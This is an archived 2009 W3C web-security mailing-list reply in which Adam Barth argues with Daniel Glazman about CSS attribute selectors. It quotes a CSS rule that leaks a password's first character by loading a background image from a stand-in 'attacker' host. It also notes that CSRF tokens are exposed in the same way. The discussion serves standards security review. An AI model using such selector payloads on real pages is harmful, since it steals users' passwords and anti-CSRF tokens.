- From: Adam Barth <w3c@adambarth.com>
- Date: Mon, 7 Dec 2009 12:29:31 -0800
- To: Daniel Glazman <daniel@glazman.org>
- Cc: public-web-security@w3.org
On Mon, Dec 7, 2009 at 12:26 PM, Daniel Glazman <daniel@glazman.org> wrote:
>>
>> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>>
>> create a new type of XSS attacks, and those are purely CSS based XSS
>> attacks.. without JS.. that will allow an attacker to read arbitrary files
>> from the page WITHOUT the need of JS.
>
> Not at all. I repeat: not at all.
I would encourage you to read the full thread before responding. A
more compelling risk is the theft of secret tokens used to protect
against CSRF. Those are stored in the default value of attributes of
input elements.
Adam
Received on Monday, 7 December 2009 20:30:38 UTC